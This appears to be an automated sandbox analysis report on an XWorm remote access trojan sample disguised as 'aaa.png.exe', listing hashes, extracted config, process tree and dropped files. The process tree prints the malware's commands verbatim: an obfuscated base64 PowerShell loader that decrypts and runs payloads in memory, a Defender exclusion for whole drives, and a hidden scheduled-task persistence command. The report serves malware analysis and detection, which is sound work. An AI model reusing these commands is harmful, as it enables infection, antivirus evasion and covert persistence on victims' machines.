xworm | cb0eec053974139f82268710c939fe6979a80e2ce7cec71fa43be8528c317271

Analysis

max time kernel
131s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19/02/2024, 12:17

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

aaa.png.exe
Size

800KB
MD5

d15ad1c6bd5e317533b04ef9eeb4dba6
SHA1

57a422b2554e1e3e3d49baa675753b603150a38d
SHA256

cb0eec053974139f82268710c939fe6979a80e2ce7cec71fa43be8528c317271
SHA512

d0d210c7ca424cbb38cd227bc987f29a65b0a2eb894e3b20b475cd10b5f16284a1da981f0f4898d14b3362eb9a41c1e4ab648c4cd999d718411f4fa73d926543
SSDEEP

12288:n4nD4q7+6D4utDCjOoK0X0Z07dYJLKKPq0HrtC+IFcf/HV1v6xKSG6EvTda:+D4q7N2OyX0adYQJHe969G3

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:7000

192.168.153.129:7000

192.168.247.1:7000

Attributes

Install_directory
%Temp%

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4796-193-0x0000021F00870000-0x0000021F00886000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1356	powershell.exe
1356	powershell.exe
2160	powershell.exe
2160	powershell.exe
1616	powershell.exe
1616	powershell.exe
3044	DllHost.exe
3044	DllHost.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	3044	DllHost.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4080 wrote to memory of 4560	4080	aaa.png.exe	90
PID 4080 wrote to memory of 4560	4080	aaa.png.exe	90
PID 4560 wrote to memory of 3216	4560	cmd.exe	92
PID 4560 wrote to memory of 3216	4560	cmd.exe	92
PID 4560 wrote to memory of 4488	4560	cmd.exe	93
PID 4560 wrote to memory of 4488	4560	cmd.exe	93
PID 4488 wrote to memory of 2936	4488	cmd.exe	95
PID 4488 wrote to memory of 2936	4488	cmd.exe	95
PID 4488 wrote to memory of 740	4488	cmd.exe	96
PID 4488 wrote to memory of 740	4488	cmd.exe	96
PID 4488 wrote to memory of 1356	4488	cmd.exe	97
PID 4488 wrote to memory of 1356	4488	cmd.exe	97
PID 1356 wrote to memory of 2160	1356	powershell.exe	98
PID 1356 wrote to memory of 2160	1356	powershell.exe	98
PID 1356 wrote to memory of 1616	1356	powershell.exe	99
PID 1356 wrote to memory of 1616	1356	powershell.exe	99
PID 1356 wrote to memory of 3044	1356	powershell.exe	131
PID 1356 wrote to memory of 3044	1356	powershell.exe	131

C:\Users\Admin\AppData\Local\Temp\aaa.png.exe
"C:\Users\Admin\AppData\Local\Temp\aaa.png.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4080
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bat.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows\system32\cmd.exe
    cmd /c "set __=^&rem"
    3⤵
    PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\bat.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\system32\cmd.exe
      cmd /c "set __=^&rem"
      4⤵
      PID:2936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\bat.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24geGFNbnAoJFp6U0p1KXskWmJrSEI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFpia0hCLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskWmJrSEIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRaYmtIQi5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVHkzN1poUEVlNXhhYmRSOSt3c2JEbHNYTElkdXVrT1AyaUp5b1dncS90az0nKTskWmJrSEIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSkpxVjhmTnJ4Nnp0Mzl1ejFLTE96dz09Jyk7JFVCcUpWPSRaYmtIQi5DcmVhdGVEZWNyeXB0b3IoKTskR01wYlM9JFVCcUpWLlRyYW5zZm9ybUZpbmFsQmxvY2soJFp6U0p1LDAsJFp6U0p1Lkxlbmd0aCk7JFVCcUpWLkRpc3Bvc2UoKTskWmJrSEIuRGlzcG9zZSgpOyRHTXBiUzt9ZnVuY3Rpb24geENDTGMoJFp6U0p1KXskbmtTREk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkWnpTSnUpOyRLbkJUZj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JEhJTHhwPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJG5rU0RJLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskSElMeHAuQ29weVRvKCRLbkJUZik7JEhJTHhwLkRpc3Bvc2UoKTskbmtTREkuRGlzcG9zZSgpOyRLbkJUZi5EaXNwb3NlKCk7JEtuQlRmLlRvQXJyYXkoKTt9JFhzZ0dsPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskYnpOWFI9eENDTGMgKHhhTW5wIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJFhzZ0dsLCA1KS5TdWJzdHJpbmcoMikpKSk7JFJKTEFWPXhDQ0xjICh4YU1ucCAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRYc2dHbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kUkpMQVYpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGJ6TlhSKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
      4⤵
      PID:740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\bat')
        5⤵
        
        PID:3044
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 47235' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        
        PID:2068
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Windows\System32\WindowsPowerShell\v1.0\\leandro.png"
        5⤵
        
        PID:1128
      - C:\Windows\system32\mspaint.exe
        
        "C:\Windows\system32\mspaint.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\leandro.png" /ForceBootstrapPaint3D
        6⤵
        
        PID:772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
        5⤵
        
        PID:4648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
        6⤵
        
        PID:2064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "set __=^&rem"
        7⤵
        
        PID:692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24geGFNbnAoJFp6U0p1KXskWmJrSEI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JFpia0hCLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskWmJrSEIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRaYmtIQi5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVHkzN1poUEVlNXhhYmRSOSt3c2JEbHNYTElkdXVrT1AyaUp5b1dncS90az0nKTskWmJrSEIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSkpxVjhmTnJ4Nnp0Mzl1ejFLTE96dz09Jyk7JFVCcUpWPSRaYmtIQi5DcmVhdGVEZWNyeXB0b3IoKTskR01wYlM9JFVCcUpWLlRyYW5zZm9ybUZpbmFsQmxvY2soJFp6U0p1LDAsJFp6U0p1Lkxlbmd0aCk7JFVCcUpWLkRpc3Bvc2UoKTskWmJrSEIuRGlzcG9zZSgpOyRHTXBiUzt9ZnVuY3Rpb24geENDTGMoJFp6U0p1KXskbmtTREk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkWnpTSnUpOyRLbkJUZj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JEhJTHhwPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJG5rU0RJLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskSElMeHAuQ29weVRvKCRLbkJUZik7JEhJTHhwLkRpc3Bvc2UoKTskbmtTREkuRGlzcG9zZSgpOyRLbkJUZi5EaXNwb3NlKCk7JEtuQlRmLlRvQXJyYXkoKTt9JFhzZ0dsPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskYnpOWFI9eENDTGMgKHhhTW5wIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJFhzZ0dsLCA1KS5TdWJzdHJpbmcoMikpKSk7JFJKTEFWPXhDQ0xjICh4YU1ucCAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRYc2dHbCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kUkpMQVYpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGJ6TlhSKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
        7⤵
        
        PID:5068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        
        PID:4796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        
        PID:640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        8⤵
        
        PID:4788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
        8⤵
        
        PID:1448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Windows\System32\WindowsPowerShell\v1.0\\leandro.png"
        8⤵
        
        PID:1100
        
        C:\Windows\system32\mspaint.exe
        
        "C:\Windows\system32\mspaint.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\leandro.png" /ForceBootstrapPaint3D
        9⤵
        
        PID:4548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 47235' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        
        PID:692

C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"
1⤵
PID:3520

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044

C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"
1⤵
PID:772

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03cc95b6f2b0ab8d2a3a281bb6c2a6a1

SHA1
8710ac4c6b50315d61bd464f3ecac2fd604ba9ed

SHA256
9a562b2bc282fae1b10879a381658bbb5ec81f5071cb9b0ae4b844d4334cdd26

SHA512
f3838e09ca5fb0ca4c6ea473f536dbd04193f23e564051f7066c2bfec69931bb38f6a1bd62177c95225b33349855e5b8bc04c3a861c6473f987bc1a0064b51d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
faf97221cbdfbff748be47a687fbdbea

SHA1
a79127fcdb71df1d60559c3854b5e70f265b384d

SHA256
84a3d439ea3d5fa0a8c237cb067e9517efc65d6f6e38b5aade62d859831dd51d

SHA512
43b25a6067178755011a593387309b9ea666df93ebfbb8d7761b80cd6609c30fbec19eb56573ec7255905e9ed3810e61fb48f0d0cb948a7e556bb46302b64d99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5dc45202474e424dc0a367387451cccc

SHA1
ce76bb80a831e9d20ecb1c4c456df78867cbea4b

SHA256
c006671b9f6dd4fa45312411fd763e63a303f99a2cfafb4f5529a2ac4e5ee9ac

SHA512
fe25877225a6362e1061edbce4dbca388cc56126d97845cfcb018f7eccc9ca352f42020fe620984c0d8db5f8d8fd30f5b27d9d5472e7bb950e11423d1be057cd

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json

Filesize
241B

MD5
6c4052a9758f7d2f8c8af1acd9f5194e

SHA1
f7d1f2b83bbc97561e90d160bafb631e636d8f43

SHA256
cccd274b92d46ddd48e54a5fe6be956842c634bb3c8b432895b4012657de3cab

SHA512
064cb3220afb0574c32d1b1694e8ce3a5b763124de22922dffce0278da46728248737eaf099e651a00d25f92f9b1768889c3bf23cae3c6edf65c17415d5cdba8

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json

Filesize
2KB

MD5
f4e4a03ebd0ab3a953c56a300d61d223

SHA1
97a9acf22c3bdd6989d7c120c21077c4d5a9a80e

SHA256
52bfb22aa2d7b0ce083d312fb8fa8dcda3063207186f99fc259aebd9064cbedc

SHA512
12aa71eea45720a4d7d057da0b662635671e4cd165ad2e0d30a3d2a43950b47dd60c26c1bbbe049418f815850e571b8d93e4c8b8cbbd686abc3cf7926ba719c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qtcbj4jc.t15.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bat.bat

Filesize
349KB

MD5
8a9b7339fe601410b7aec591b1b436e0

SHA1
bfd4d99c153a6363cb1fe882f1f96ef140e303be

SHA256
871c896e30e22c5743dbeafe3e0d526c7d1169b51e97fa76744dbf6ee9f1648a

SHA512
f35256c4febbdf8ba808bf9f99f184429d041f478242a3bb64998be0888dfc3b4b6120a4115b1005db9cd4b7230266d65d03521676370a305cdf632b9a88d7c2

Download Submit
C:\Windows\System32\WindowsPowerShell\v1.0\leandro.png

Filesize
59KB

MD5
e68a7e1bd2742948103d106e86fcdf2b

SHA1
6c1ed9f527123d66a7dcef313bd0ffdf7f9ae942

SHA256
bc07b6629c8f1289e876a6fa43035d8fedee3cc0b70512f146757448f099e3a5

SHA512
72e348c4dfd367b5b7cf5b88bd67b9d45545d108ecc8a5706fddff2308740692893cf6b167d7c64e3b33b2ed0b392fad498ba8f84f15c7ac6990081bdc8362c4

Download Submit
memory/640-122-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/640-109-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/640-120-0x000002239E5D0000-0x000002239E5E0000-memory.dmp

Filesize
64KB

Download
memory/640-110-0x000002239E5D0000-0x000002239E5E0000-memory.dmp

Filesize
64KB

Download
memory/692-190-0x00000268B6CD0000-0x00000268B6CE0000-memory.dmp

Filesize
64KB

Download
memory/692-167-0x00000268B6CD0000-0x00000268B6CE0000-memory.dmp

Filesize
64KB

Download
memory/692-192-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/692-179-0x00000268B6CD0000-0x00000268B6CE0000-memory.dmp

Filesize
64KB

Download
memory/692-166-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1356-16-0x000001E937190000-0x000001E9371D4000-memory.dmp

Filesize
272KB

Download
memory/1356-15-0x000001E934CF0000-0x000001E934D00000-memory.dmp

Filesize
64KB

Download
memory/1356-108-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1356-35-0x00007FFDAB1A0000-0x00007FFDAB25E000-memory.dmp

Filesize
760KB

Download
memory/1356-50-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1356-56-0x000001E934CF0000-0x000001E934D00000-memory.dmp

Filesize
64KB

Download
memory/1356-34-0x00007FFDAD150000-0x00007FFDAD345000-memory.dmp

Filesize
2.0MB

Download
memory/1356-67-0x000001E934CF0000-0x000001E934D00000-memory.dmp

Filesize
64KB

Download
memory/1356-11-0x000001E934C90000-0x000001E934CB2000-memory.dmp

Filesize
136KB

Download
memory/1356-33-0x000001E934CE0000-0x000001E934CEA000-memory.dmp

Filesize
40KB

Download
memory/1356-12-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1356-13-0x000001E934CF0000-0x000001E934D00000-memory.dmp

Filesize
64KB

Download
memory/1356-14-0x000001E934CF0000-0x000001E934D00000-memory.dmp

Filesize
64KB

Download
memory/1356-17-0x000001E9371E0000-0x000001E937256000-memory.dmp

Filesize
472KB

Download
memory/1356-36-0x000001E936DD0000-0x000001E936E16000-memory.dmp

Filesize
280KB

Download
memory/1448-142-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1448-156-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1616-51-0x000002AEA0B60000-0x000002AEA0B70000-memory.dmp

Filesize
64KB

Download
memory/1616-47-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/1616-49-0x000002AEA0B60000-0x000002AEA0B70000-memory.dmp

Filesize
64KB

Download
memory/1616-48-0x000002AEA0B60000-0x000002AEA0B70000-memory.dmp

Filesize
64KB

Download
memory/1616-53-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/2068-84-0x000002056B5E0000-0x000002056B5F0000-memory.dmp

Filesize
64KB

Download
memory/2068-90-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/2068-83-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/2068-86-0x000002056B5E0000-0x000002056B5F0000-memory.dmp

Filesize
64KB

Download
memory/2068-88-0x000002056B5E0000-0x000002056B5F0000-memory.dmp

Filesize
64KB

Download
memory/2160-18-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/2160-24-0x000001D9CBD40000-0x000001D9CBD50000-memory.dmp

Filesize
64KB

Download
memory/2160-29-0x000001D9CBD40000-0x000001D9CBD50000-memory.dmp

Filesize
64KB

Download
memory/2160-32-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/3044-68-0x000001C6B36A0000-0x000001C6B36B0000-memory.dmp

Filesize
64KB

Download
memory/3044-70-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/3044-55-0x000001C6B36A0000-0x000001C6B36B0000-memory.dmp

Filesize
64KB

Download
memory/3044-54-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/4788-139-0x000001EC7ADC0000-0x000001EC7ADD0000-memory.dmp

Filesize
64KB

Download
memory/4788-141-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/4788-127-0x000001EC7ADC0000-0x000001EC7ADD0000-memory.dmp

Filesize
64KB

Download
memory/4788-126-0x000001EC7ADC0000-0x000001EC7ADD0000-memory.dmp

Filesize
64KB

Download
memory/4788-125-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/4796-152-0x0000021F7DB40000-0x0000021F7DB50000-memory.dmp

Filesize
64KB

Download
memory/4796-107-0x0000021F7DB40000-0x0000021F7DB50000-memory.dmp

Filesize
64KB

Download
memory/4796-154-0x0000021F7DB40000-0x0000021F7DB50000-memory.dmp

Filesize
64KB

Download
memory/4796-138-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/4796-124-0x00007FFDAB1A0000-0x00007FFDAB25E000-memory.dmp

Filesize
760KB

Download
memory/4796-123-0x00007FFDAD150000-0x00007FFDAD345000-memory.dmp

Filesize
2.0MB

Download
memory/4796-95-0x00007FFD8E770000-0x00007FFD8F231000-memory.dmp

Filesize
10.8MB

Download
memory/4796-96-0x0000021F7DB40000-0x0000021F7DB50000-memory.dmp

Filesize
64KB

Download
memory/4796-193-0x0000021F00870000-0x0000021F00886000-memory.dmp

Filesize
88KB

Download